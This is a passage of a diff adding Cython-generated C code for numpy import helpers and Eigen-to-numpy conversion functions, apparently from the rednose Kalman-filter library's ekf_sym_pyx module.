<<<<<<<<<<<<<< + * __pyx_import_array() + * except Exception: + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_2, &__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_3); + /*try:*/ { + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":984 + * cdef inline int import_array() except -1: + * try: + * __pyx_import_array() # <<<<<<<<<<<<<< + * except Exception: + * raise ImportError("numpy.core.multiarray failed to import") + */ + __pyx_t_4 = _import_array(); if (unlikely(__pyx_t_4 == ((int)-1))) __PYX_ERR(2, 984, __pyx_L3_error) + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":983 + * # Cython code. + * cdef inline int import_array() except -1: + * try: # <<<<<<<<<<<<<< + * __pyx_import_array() + * except Exception: + */ + } + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + goto __pyx_L8_try_end; + __pyx_L3_error:; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":985 + * try: + * __pyx_import_array() + * except Exception: # <<<<<<<<<<<<<< + * raise ImportError("numpy.core.multiarray failed to import") + * + */ + __pyx_t_4 = __Pyx_PyErr_ExceptionMatches(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0]))); + if (__pyx_t_4) { + __Pyx_AddTraceback("numpy.import_array", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_5, &__pyx_t_6, &__pyx_t_7) < 0) __PYX_ERR(2, 985, __pyx_L5_except_error) + __Pyx_XGOTREF(__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_6); + __Pyx_XGOTREF(__pyx_t_7); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":986 + * __pyx_import_array() + * except Exception: + * raise ImportError("numpy.core.multiarray failed to import") # <<<<<<<<<<<<<< + * + * cdef inline int import_umath() except -1: + */ + __pyx_t_8 = __Pyx_PyObject_Call(__pyx_builtin_ImportError, __pyx_tuple__15, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(2, 986, __pyx_L5_except_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_Raise(__pyx_t_8, 0, 0, 0); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __PYX_ERR(2, 986, __pyx_L5_except_error) + } + goto __pyx_L5_except_error; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":983 + * # Cython code. + * cdef inline int import_array() except -1: + * try: # <<<<<<<<<<<<<< + * __pyx_import_array() + * except Exception: + */ + __pyx_L5_except_error:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); + goto __pyx_L1_error; + __pyx_L8_try_end:; + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":982 + * # Versions of the import_* functions which are more suitable for + * # Cython code. + * cdef inline int import_array() except -1: # <<<<<<<<<<<<<< + * try: + * __pyx_import_array() + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("numpy.import_array", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":988 + * raise ImportError("numpy.core.multiarray failed to import") + * + * cdef inline int import_umath() except -1: # <<<<<<<<<<<<<< + * try: + * _import_umath() + */ + +static CYTHON_INLINE int __pyx_f_5numpy_import_umath(void) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("import_umath", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":989 + * + * cdef inline int import_umath() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_2, &__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_3); + /*try:*/ { + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":990 + * cdef inline int import_umath() except -1: + * try: + * _import_umath() # <<<<<<<<<<<<<< + * except Exception: + * raise ImportError("numpy.core.umath failed to import") + */ + __pyx_t_4 = _import_umath(); if (unlikely(__pyx_t_4 == ((int)-1))) __PYX_ERR(2, 990, __pyx_L3_error) + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":989 + * + * cdef inline int import_umath() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + } + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + goto __pyx_L8_try_end; + __pyx_L3_error:; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":991 + * try: + * _import_umath() + * except Exception: # <<<<<<<<<<<<<< + * raise ImportError("numpy.core.umath failed to import") + * + */ + __pyx_t_4 = __Pyx_PyErr_ExceptionMatches(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0]))); + if (__pyx_t_4) { + __Pyx_AddTraceback("numpy.import_umath", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_5, &__pyx_t_6, &__pyx_t_7) < 0) __PYX_ERR(2, 991, __pyx_L5_except_error) + __Pyx_XGOTREF(__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_6); + __Pyx_XGOTREF(__pyx_t_7); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":992 + * _import_umath() + * except Exception: + * raise ImportError("numpy.core.umath failed to import") # <<<<<<<<<<<<<< + * + * cdef inline int import_ufunc() except -1: + */ + __pyx_t_8 = __Pyx_PyObject_Call(__pyx_builtin_ImportError, __pyx_tuple__16, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(2, 992, __pyx_L5_except_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_Raise(__pyx_t_8, 0, 0, 0); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __PYX_ERR(2, 992, __pyx_L5_except_error) + } + goto __pyx_L5_except_error; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":989 + * + * cdef inline int import_umath() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + __pyx_L5_except_error:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); + goto __pyx_L1_error; + __pyx_L8_try_end:; + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":988 + * raise ImportError("numpy.core.multiarray failed to import") + * + * cdef inline int import_umath() except -1: # <<<<<<<<<<<<<< + * try: + * _import_umath() + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("numpy.import_umath", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":994 + * raise ImportError("numpy.core.umath failed to import") + * + * cdef inline int import_ufunc() except -1: # <<<<<<<<<<<<<< + * try: + * _import_umath() + */ + +static CYTHON_INLINE int __pyx_f_5numpy_import_ufunc(void) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("import_ufunc", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":995 + * + * cdef inline int import_ufunc() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_2, &__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_3); + /*try:*/ { + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":996 + * cdef inline int import_ufunc() except -1: + * try: + * _import_umath() # <<<<<<<<<<<<<< + * except Exception: + * raise ImportError("numpy.core.umath failed to import") + */ + __pyx_t_4 = _import_umath(); if (unlikely(__pyx_t_4 == ((int)-1))) __PYX_ERR(2, 996, __pyx_L3_error) + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":995 + * + * cdef inline int import_ufunc() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + } + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + goto __pyx_L8_try_end; + __pyx_L3_error:; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":997 + * try: + * _import_umath() + * except Exception: # <<<<<<<<<<<<<< + * raise ImportError("numpy.core.umath failed to import") + * + */ + __pyx_t_4 = __Pyx_PyErr_ExceptionMatches(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0]))); + if (__pyx_t_4) { + __Pyx_AddTraceback("numpy.import_ufunc", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_5, &__pyx_t_6, &__pyx_t_7) < 0) __PYX_ERR(2, 997, __pyx_L5_except_error) + __Pyx_XGOTREF(__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_6); + __Pyx_XGOTREF(__pyx_t_7); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":998 + * _import_umath() + * except Exception: + * raise ImportError("numpy.core.umath failed to import") # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_8 = __Pyx_PyObject_Call(__pyx_builtin_ImportError, __pyx_tuple__16, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(2, 998, __pyx_L5_except_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_Raise(__pyx_t_8, 0, 0, 0); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __PYX_ERR(2, 998, __pyx_L5_except_error) + } + goto __pyx_L5_except_error; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":995 + * + * cdef inline int import_ufunc() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + __pyx_L5_except_error:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); + goto __pyx_L1_error; + __pyx_L8_try_end:; + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":994 + * raise ImportError("numpy.core.umath failed to import") + * + * cdef inline int import_ufunc() except -1: # <<<<<<<<<<<<<< + * try: + * _import_umath() + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("numpy.import_ufunc", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1001 + * + * + * cdef inline bint is_timedelta64_object(object obj): # <<<<<<<<<<<<<< + * """ + * Cython equivalent of `isinstance(obj, np.timedelta64)` + */ + +static CYTHON_INLINE int __pyx_f_5numpy_is_timedelta64_object(PyObject *__pyx_v_obj) { + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("is_timedelta64_object", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1013 + * bool + * """ + * return PyObject_TypeCheck(obj, &PyTimedeltaArrType_Type) # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = PyObject_TypeCheck(__pyx_v_obj, (&PyTimedeltaArrType_Type)); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1001 + * + * + * cdef inline bint is_timedelta64_object(object obj): # <<<<<<<<<<<<<< + * """ + * Cython equivalent of `isinstance(obj, np.timedelta64)` + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1016 + * + * + * cdef inline bint is_datetime64_object(object obj): # <<<<<<<<<<<<<< + * """ + * Cython equivalent of `isinstance(obj, np.datetime64)` + */ + +static CYTHON_INLINE int __pyx_f_5numpy_is_datetime64_object(PyObject *__pyx_v_obj) { + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("is_datetime64_object", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1028 + * bool + * """ + * return PyObject_TypeCheck(obj, &PyDatetimeArrType_Type) # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = PyObject_TypeCheck(__pyx_v_obj, (&PyDatetimeArrType_Type)); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1016 + * + * + * cdef inline bint is_datetime64_object(object obj): # <<<<<<<<<<<<<< + * """ + * Cython equivalent of `isinstance(obj, np.datetime64)` + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1031 + * + * + * cdef inline npy_datetime get_datetime64_value(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the int64 value underlying scalar numpy datetime64 object + */ + +static CYTHON_INLINE npy_datetime __pyx_f_5numpy_get_datetime64_value(PyObject *__pyx_v_obj) { + npy_datetime __pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1038 + * also needed. That can be found using `get_datetime64_unit`. + * """ + * return (obj).obval # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = ((PyDatetimeScalarObject *)__pyx_v_obj)->obval; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1031 + * + * + * cdef inline npy_datetime get_datetime64_value(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the int64 value underlying scalar numpy datetime64 object + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1041 + * + * + * cdef inline npy_timedelta get_timedelta64_value(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the int64 value underlying scalar numpy timedelta64 object + */ + +static CYTHON_INLINE npy_timedelta __pyx_f_5numpy_get_timedelta64_value(PyObject *__pyx_v_obj) { + npy_timedelta __pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1045 + * returns the int64 value underlying scalar numpy timedelta64 object + * """ + * return (obj).obval # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = ((PyTimedeltaScalarObject *)__pyx_v_obj)->obval; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1041 + * + * + * cdef inline npy_timedelta get_timedelta64_value(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the int64 value underlying scalar numpy timedelta64 object + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1048 + * + * + * cdef inline NPY_DATETIMEUNIT get_datetime64_unit(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the unit part of the dtype for a numpy datetime64 object. + */ + +static CYTHON_INLINE NPY_DATETIMEUNIT __pyx_f_5numpy_get_datetime64_unit(PyObject *__pyx_v_obj) { + NPY_DATETIMEUNIT __pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1052 + * returns the unit part of the dtype for a numpy datetime64 object. + * """ + * return (obj).obmeta.base # <<<<<<<<<<<<<< + */ + __pyx_r = ((NPY_DATETIMEUNIT)((PyDatetimeScalarObject *)__pyx_v_obj)->obmeta.base); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1048 + * + * + * cdef inline NPY_DATETIMEUNIT get_datetime64_unit(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the unit part of the dtype for a numpy datetime64 object. + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "rednose/helpers/ekf_sym_pyx.pyx":71 + * @cython.wraparound(False) + * @cython.boundscheck(False) + * cdef np.ndarray[np.float64_t, ndim=2, mode="c"] matrix_to_numpy(MatrixXdr arr): # <<<<<<<<<<<<<< + * cdef double[:,:] mem_view = arr.data() + * return np.copy(np.asarray(mem_view, dtype=np.double, order="C")) + */ + +static PyArrayObject *__pyx_f_7rednose_7helpers_11ekf_sym_pyx_matrix_to_numpy(Eigen::Matrix __pyx_v_arr) { + __Pyx_memviewslice __pyx_v_mem_view = { 0, 0, { 0 }, { 0 }, { 0 } }; + PyArrayObject *__pyx_r = NULL; + __Pyx_TraceDeclarations + __Pyx_RefNannyDeclarations + double *__pyx_t_1; + struct __pyx_array_obj *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + __Pyx_memviewslice __pyx_t_5 = { 0, 0, { 0 }, { 0 }, { 0 } }; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + PyObject *__pyx_t_9 = NULL; + PyObject *__pyx_t_10 = NULL; + int __pyx_t_11; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("matrix_to_numpy", 0); + __Pyx_TraceCall("matrix_to_numpy", __pyx_f[0], 71, 0, __PYX_ERR(0, 71, __pyx_L1_error)); + + /* "rednose/helpers/ekf_sym_pyx.pyx":72 + * @cython.boundscheck(False) + * cdef np.ndarray[np.float64_t, ndim=2, mode="c"] matrix_to_numpy(MatrixXdr arr): + * cdef double[:,:] mem_view = arr.data() # <<<<<<<<<<<<<< + * return np.copy(np.asarray(mem_view, dtype=np.double, order="C")) + * + */ + __pyx_t_1 = __pyx_v_arr.data(); + if (!__pyx_t_1) { + PyErr_SetString(PyExc_ValueError,"Cannot create cython.array from NULL pointer"); + __PYX_ERR(0, 72, __pyx_L1_error) + } + __pyx_t_4 = __pyx_format_from_typeinfo(&__Pyx_TypeInfo_double); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 72, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_3 = Py_BuildValue((char*) "(" __PYX_BUILD_PY_SSIZE_T __PYX_BUILD_PY_SSIZE_T ")", ((Py_ssize_t)__pyx_v_arr.rows()), ((Py_ssize_t)__pyx_v_arr.cols())); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 72, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_2 = __pyx_array_new(__pyx_t_3, sizeof(double), PyBytes_AS_STRING(__pyx_t_4), (char *) "c", (char *) __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 72, __pyx_L1_error) + __Pyx_GOTREF((PyObject *)__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_5 = __Pyx_PyObject_to_MemoryviewSlice_dsds_double(((PyObject *)__pyx_t_2), PyBUF_WRITABLE); if (unlikely(!__pyx_t_5.memview)) __PYX_ERR(0, 72, __pyx_L1_error) + __Pyx_DECREF((PyObject *)__pyx_t_2); __pyx_t_2 = 0; + __pyx_v_mem_view = __pyx_t_5; + __pyx_t_5.memview = NULL; + __pyx_t_5.data = NULL; + + /* "rednose/helpers/ekf_sym_pyx.pyx":73 + * cdef np.ndarray[np.float64_t, ndim=2, mode="c"] matrix_to_numpy(MatrixXdr arr): + * cdef double[:,:] mem_view = arr.data() + * return np.copy(np.asarray(mem_view, dtype=np.double, order="C")) # <<<<<<<<<<<<<< + * + * @cython.wraparound(False) + */ + __Pyx_XDECREF((PyObject *)__pyx_r); + __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_np); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 73, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_6 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_copy); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 73, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_np); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 73, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_asarray); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 73, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = __pyx_memoryview_fromslice(__pyx_v_mem_view, 2, (PyObject *(*)(char *)) __pyx_memview_get_double, (int (*)(char *, PyObject *)) __pyx_memview_set_double, 0);; if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 73, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_8 = PyTuple_New(1); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 73, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_GIVEREF(__pyx_t_3); + PyTuple_SET_ITEM(__pyx_t_8, 0, __pyx_t_3); + __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_PyDict_NewPresized(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 73, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GetModuleGlobalName(__pyx_t_9, __pyx_n_s_np); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 73, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_9); + __pyx_t_10 = __Pyx_PyObject_GetAttrStr(__pyx_t_9, __pyx_n_s_double); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 73, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; + if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_dtype, __pyx_t_10) < 0) __PYX_ERR(0, 73, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_order, __pyx_n_u_C) < 0) __PYX_ERR(0, 73, __pyx_L1_error) + __pyx_t_10 = __Pyx_PyObject_Call(__pyx_t_7, __pyx_t_8, __pyx_t_3); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 73, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = NULL; + __pyx_t_11 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_6))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_6); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_6); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_6, function); + __pyx_t_11 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_t_10}; + __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_6, __pyx_callargs+1-__pyx_t_11, 1+__pyx_t_11); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 73, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + } + if (!(likely(((__pyx_t_4) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_4, __pyx_ptype_5numpy_ndarray))))) __PYX_ERR(0, 73, __pyx_L1_error) + __pyx_r = ((PyArrayObject *)__pyx_t_4); + __pyx_t_4 = 0; + goto __pyx_L0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":71 + * @cython.wraparound(False) + * @cython.boundscheck(False) + * cdef np.ndarray[np.float64_t, ndim=2, mode="c"] matrix_to_numpy(MatrixXdr arr): # <<<<<<<<<<<<<< + * cdef double[:,:] mem_view = arr.data() + * return np.copy(np.asarray(mem_view, dtype=np.double, order="C")) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF((PyObject *)__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __PYX_XCLEAR_MEMVIEW(&__pyx_t_5, 1); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_XDECREF(__pyx_t_9); + __Pyx_XDECREF(__pyx_t_10); + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.matrix_to_numpy", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __PYX_XCLEAR_MEMVIEW(&__pyx_v_mem_view, 1); + __Pyx_XGIVEREF((PyObject *)__pyx_r); + __Pyx_TraceReturn(__pyx_r, 0); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "rednose/helpers/ekf_sym_pyx.pyx":77 + * @cython.wraparound(False) + * @cython.boundscheck(False) + * cdef np.ndarray[np.float64_t, ndim=1, mode="c"] vector_to_numpy(VectorXd arr): # <<<<<<<<<<<<<< + * cdef double[:] mem_view = arr.data() + * return np.copy(np.asarray(mem_view, dtype=np.double, order="C")) + */ + +static PyArrayObject *__pyx_f_7rednose_7helpers_11ekf_sym_pyx_vector_to_numpy(Eigen::VectorXd __pyx_v_arr) { 